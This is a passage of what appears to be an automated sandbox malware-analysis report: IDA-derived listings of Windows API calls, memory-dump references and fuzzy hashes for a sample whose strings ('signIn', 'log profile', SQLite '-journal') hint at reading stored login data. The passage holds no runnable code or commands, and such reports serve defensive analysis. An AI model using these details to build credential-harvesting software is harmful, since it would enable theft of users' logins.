                                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                                    • String ID: ($d
                                                                                                                                                                                                                                    • API String ID: 1140211610-1915259565
                                                                                                                                                                                                                                    • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                                                                                                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3015003838-0
                                                                                                                                                                                                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 59245283-0
                                                                                                                                                                                                                                    • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                                                                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                                                                    • free.MSVCRT ref: 004185AC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2802642348-0
                                                                                                                                                                                                                                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                                                                    • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                                                                    • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                                    • String ID: 3A
                                                                                                                                                                                                                                    • API String ID: 3300951397-293699754
                                                                                                                                                                                                                                    • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                                                                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                                    • String ID: strings
                                                                                                                                                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                                    • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                                    • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                                                    • API String ID: 776488737-1622828088
                                                                                                                                                                                                                                    • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                                    • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                                    • String ID: -journal$-wal
                                                                                                                                                                                                                                    • API String ID: 438689982-2894717839
                                                                                                                                                                                                                                    • Opcode ID: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                                                                                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3975816621-0
                                                                                                                                                                                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                                                    • API String ID: 1214746602-2708368587
                                                                                                                                                                                                                                    • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                                                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00405E33
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
